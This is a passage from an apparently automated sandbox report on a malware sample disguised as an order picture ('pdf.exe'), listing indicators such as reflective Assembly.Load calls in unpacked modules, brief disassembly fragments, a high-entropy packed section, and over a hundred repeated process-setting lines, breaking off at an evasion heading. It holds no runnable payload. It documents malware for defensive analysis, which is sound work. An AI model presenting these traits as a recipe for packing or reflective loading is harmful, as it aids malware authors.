                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.11.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.13.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF92F5 push ds; ret 0_2_00DF9340
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF9347 push ds; ret 0_2_00DF934C
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF9361 push ds; retf 0_2_00DF9364
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E9361 push ds; retf 3_2_003E9364
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E9347 push ds; ret 3_2_003E934C
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E92F5 push ds; ret 3_2_003E9340
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C92F5 push ds; ret 5_2_008C9340
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C9347 push ds; ret 5_2_008C934C
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C9361 push ds; retf 5_2_008C9364
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.8848412694
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion: